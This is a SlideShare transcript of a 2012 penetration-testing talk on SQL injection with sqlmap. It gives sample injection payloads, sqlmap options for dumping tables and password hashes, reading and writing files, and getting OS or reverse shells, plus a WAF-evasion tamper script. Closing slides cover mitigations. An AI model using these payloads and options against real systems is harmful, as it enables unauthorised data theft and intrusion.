Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
SQL injection with sqlmap                          Herman Duarte <hcoduarte@gmail.com>Tuesday, December 4, 12             ...
About me              Consultant @ INTEGRITY S.A. - www.integrity.pt              Penetration testing engagements         ...
Roadmap              SQL injection (SQLi) 101              sqlmap              Mitigation techniques              Wrap-upT...
SQLi 101: Definition              Definition:                    SQL injection occurs when it is possible to inject SQL     ...
SQLi 101: Structure              ...?name=robert’ union all select null,@@version,null #                          Prefix   ...
sqlmap              Developed in python              Prerequisites to run sqlmap:                    Python 2.6.x or 2.7.x...
sqlmap              Mainly developed by:                Bernardo Damele A.G.   Miroslav Stampar                     (@inqu...
sqlmap: Scenarios              Find and explore SQL injection in web applications              Direct connection (database...
sqlmap: Workflow              Select your target              Identify possible injection points              Identify SQLi...
sqlmap: Target selection              -u “<url>” (e.g. https://webapp.com/news.php?id=1)              -r <request file>    ...
sqlmap: Injection points              GET parameters              POST parameters              Cookie header values (only ...
sqlmap: Finding SQLi (I)              ./sqlmap.py -u “https://webapp.com/news.php?id=1”              or              ./sql...
sqlmap: Finding SQLi (II)              --level=<level> (1...5 - default is 1)                    With --level=5 every comb...
sqlmap: SQLi techniques/types              --technique=SU (default is all of them: BEUST)              Boolean-based blind...
sqlmap: Supported DBMSs                --dbms=mssql | mysql | postgresql | oracle ...                  Microsoft SQL Serve...
sqlmap: Logging / Verbosity              Logs all HTTP traffic in a text file: -t <output file>              Save options use...
sqlmap: Enumeration (I)              Objective:                    Get data from the DBMS tables (limited the privileges t...
sqlmap: Enumeration (II)              What can you get:                    ...                    List the DBMS users: --u...
sqlmap: Enumeration (III)              What can you get:                    ...                    List all columns or jus...
sqlmap: Enumeration (IV)              What can you get:                    ...                          Executing a custom...
sqlmap: File system access              Objective:                    Read and write any textual or binary file from the DB...
sqlmap: OS pwnage (I)              Objective:                    Get access to the DBMS O.S. and the Internal network (if ...
sqlmap: OS pwnage (II)              To execute an OS command:                    --os-cmd=”<command to execute>”          ...
sqlmap: Tamper scripts              Tamper scripts:                    --tamper <script file path>[,<script file path>]     ...
sqlmap                          DEMOTuesday, December 4, 12          25
sqlmap: Tips              If HTTPS is being used, don’t forget to set: --force-ssl              Get the most info as you c...
Mitigation Techniques              Sanitize input              Use prepared statements / bind variables              Config...
Wrap-up              Input sanitization              Use prepared statements              Least-privilege principle is you...
References              https://sqlmap.org              Advanced SQL injection to operating system full              contr...
Thank You!                                   Q&A         	       Herman Duarte         	       @hdontwit         	       h...
Upcoming SlideShare
Loading in …5
×

Sql injection with sqlmap

54,796 views

Published on

Slides that I used when I presented @ Confraria VI and Security&IT in November 2012

Sql injection with sqlmap

  1. 1. SQL injection with sqlmap Herman Duarte <hcoduarte@gmail.com>Tuesday, December 4, 12 1
  2. 2. About me Consultant @ INTEGRITY S.A. - www.integrity.pt Penetration testing engagements BSc in Information Systems and Computer Engineering CISSP Associate / ISO27001LA / CCNA Security addict :)Tuesday, December 4, 12 2
  3. 3. Roadmap SQL injection (SQLi) 101 sqlmap Mitigation techniques Wrap-upTuesday, December 4, 12 3
  4. 4. SQLi 101: Definition Definition: SQL injection occurs when it is possible to inject SQL commands in data-plane input in order to affect the execution of predefined SQL statements It affects any application that uses non-sanitized user-supplied input, in dynamic SQL query constructions (e.g. web apps, fat clients) Cause: Bad programming practices + Lack of knowledge/ awarenessTuesday, December 4, 12 4
  5. 5. SQLi 101: Structure ...?name=robert’ union all select null,@@version,null # Prefix Payload Suffix $query = “SELECT name,status,age FROM user WHERE name=’” . $_REQUEST[‘search’] . “‘ AND age > 42”;Tuesday, December 4, 12 5
  6. 6. sqlmap Developed in python Prerequisites to run sqlmap: Python 2.6.x or 2.7.x To install: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap To update: python sqlmap.py --update git pullTuesday, December 4, 12 6
  7. 7. sqlmap Mainly developed by: Bernardo Damele A.G. Miroslav Stampar (@inquisb) (@stramparm)Tuesday, December 4, 12 7
  8. 8. sqlmap: Scenarios Find and explore SQL injection in web applications Direct connection (database account is needed) DBMS python binding installed (e.g. PyMySQL) -d <dbms>://<user>:<password>@<ip>:<port>/<db_name>Tuesday, December 4, 12 8
  9. 9. sqlmap: Workflow Select your target Identify possible injection points Identify SQLi vulnerabilities: By using sqlmap Manual testing :) Exploit SQLi vunerabilities: Enumerate File system access OS pwnage Own the internal network (w00t! w00t!)Tuesday, December 4, 12 9
  10. 10. sqlmap: Target selection -u “<url>” (e.g. https://webapp.com/news.php?id=1) -r <request file> GET /news.php?id=1&Submit=Submit HTTP/1.1 Host: webapp.com User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: https://webapp.com/index.php Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777; DNT: 1Tuesday, December 4, 12 10
  11. 11. sqlmap: Injection points GET parameters POST parameters Cookie header values (only if --level >= 2) User-Agent header value (only if --level >= 3) Referer header value (only if --level >= 3)Tuesday, December 4, 12 11
  12. 12. sqlmap: Finding SQLi (I) ./sqlmap.py -u “https://webapp.com/news.php?id=1” or ./sqlmap.y -r news_get_request --force-ssl Default behavior: Tests all GET and/or POST parameters, for all SQLi types, for all databases (if not discovered during tests) Yes it may take a long time, and it doesn’t cover all tests sqlmap can do.Tuesday, December 4, 12 12
  13. 13. sqlmap: Finding SQLi (II) --level=<level> (1...5 - default is 1) With --level=5 every combination of payload, prefix and suffix will be tested on all injection points available (noisier but gives more coverage) --risk=<risk> (0...3) - default is 1) To do tests using OR --risk=3. Why? Imagine this: UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1# -p <param to test>[, <param to test>]Tuesday, December 4, 12 13
  14. 14. sqlmap: SQLi techniques/types --technique=SU (default is all of them: BEUST) Boolean-based blind Based on page changes, data is inferred, char by char Error-based Uses the errors that are displayed to extract data Union query-based Changes the SQL queries to extract data Stacked queries Semi-colon are used to inject multiple statements on the SQL query Time-based blind Based on time, data is inferred, char by charTuesday, December 4, 12 14
  15. 15. sqlmap: Supported DBMSs --dbms=mssql | mysql | postgresql | oracle ... Microsoft SQL Server SAP MaxDB MySQL Sybase PostgreSQL Firebird Oracle SQLite IBM DB2 Microsoft AccessTuesday, December 4, 12 15
  16. 16. sqlmap: Logging / Verbosity Logs all HTTP traffic in a text file: -t <output file> Save options used in command line: --save <file> Verbosity : -v <0..6> (default 1) -v 6 same as -t but, output to consoleTuesday, December 4, 12 16
  17. 17. sqlmap: Enumeration (I) Objective: Get data from the DBMS tables (limited the privileges the current DBMS user have) What can you get: DBMS exact version, O.S. information, architecture and patch level: -f DBMS banner: -b DBMS server hostname: --hostname DBMS user the application is using: --current-user Applications current DB: --current-db If the current user is a DBA: --is-dbaTuesday, December 4, 12 17
  18. 18. sqlmap: Enumeration (II) What can you get: ... List the DBMS users: --users List all DBMS users, password hashes: --passwords sqlmap will automatically try to crack the hashes with a dictionary attack List users privileges: --privileges List all available databases: --dbs List all tables or just for a specific database: --tables (-D <database name>)Tuesday, December 4, 12 18
  19. 19. sqlmap: Enumeration (III) What can you get: ... List all columns or just for a specific table from that database: --columns (-T <table name> -D <db name>) Count table entries: --count Dump data from a database/table/column: --dump (-D, -T, -C can be used to select what data to dump) --dump-all (I don’t recommend it) Search for a specific or part of a database name, table name or column name: --search= (-D, -T, -C to specify what to search)Tuesday, December 4, 12 19
  20. 20. sqlmap: Enumeration (IV) What can you get: ... Executing a custom SQL query: --sql-query=”<sql query to execute>” Interactive SQL shell to execute all your custom SQL queries: --sql-shellTuesday, December 4, 12 20
  21. 21. sqlmap: File system access Objective: Read and write any textual or binary file from the DBMS O.S. Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges Read: --file-read=”<file path>” Write: --file-write=”<file local path>” --file-dest=”<remote file location path>”Tuesday, December 4, 12 21
  22. 22. sqlmap: OS pwnage (I) Objective: Get access to the DBMS O.S. and the Internal network (if DBMS server in the internal network) Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges What can you do? Get a reverse shell if the DB can: connect to the internet ping your server (yes an icmp shell :)) Establish a VNC connectionTuesday, December 4, 12 22
  23. 23. sqlmap: OS pwnage (II) To execute an OS command: --os-cmd=”<command to execute>” To get an OS shell: --os-shell To get a meterpreter shell, an icmpshell or VNC: --os-pwn --msf-path=”<msf path>” Store procedure privilege escalation (buffer overflow): --bofTuesday, December 4, 12 23
  24. 24. sqlmap: Tamper scripts Tamper scripts: --tamper <script file path>[,<script file path>] tamper/bluecoat.py def tamper(payload, headers=None): Example: * Input: SELECT id FROM users where id = 1 * Output: SELECT%09id FROM users where id LIKE 1 Requirement: * MySQL, Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147 if payload: retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)s+", r"g<1>t", payload) retVal = re.sub(r"s*=s*", " LIKE ", retVal)Tuesday, December 4, 12 24
  25. 25. sqlmap DEMOTuesday, December 4, 12 25
  26. 26. sqlmap: Tips If HTTPS is being used, don’t forget to set: --force-ssl Get the most info as you can before starting to find SQLi vulnerabilities. It will save you time. Union-based gives more data with less requests, use it Time-based blind SQLi is faster to check in comparison to Union-based query (in cases where a lot of columns are used) If --is-dba=true, --technique=S you can start to gangnam styleTuesday, December 4, 12 26
  27. 27. Mitigation Techniques Sanitize input Use prepared statements / bind variables Configure DBMS users configured with least-privilege principle in mind Use generic errors don’t pass them to the user In case the web application source code can’t be changed, a proxy can be used, between the web server and the database server (e.g. GreenSQL)Tuesday, December 4, 12 27
  28. 28. Wrap-up Input sanitization Use prepared statements Least-privilege principle is your friend (use it!) Have I said to use prepared statements ?! :) Do code reviewsTuesday, December 4, 12 28
  29. 29. References https://sqlmap.org Advanced SQL injection to operating system full control - http://www.slideshare.net/inquis/advanced- sql-injection-to-operating-system-full-control- whitepaper-4633857 SQL Injection Attacks and Defenses - http:// www.amazon.com/Injection-Attacks-Defense-Justin- Clarke/dp/1597494240Tuesday, December 4, 12 29
  30. 30. Thank You! Q&A Herman Duarte @hdontwit https://www.linkedin.com/in/hcoduarte hcoduarte@gmail.comTuesday, December 4, 12 30

×